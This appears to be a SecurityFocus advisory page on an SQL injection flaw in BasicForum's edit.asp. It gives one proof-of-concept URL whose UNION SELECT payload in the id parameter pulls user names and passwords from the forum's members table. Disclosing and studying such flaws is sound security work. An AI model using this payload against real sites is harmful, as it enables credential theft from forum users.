info
discussion
exploit
solution
references
BasicForum EDIT.ASP SQL Injection Vulnerability
A proof of concept is available.
http://www.example.com/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
Privacy Statement
Copyright 2010, SecurityFocus
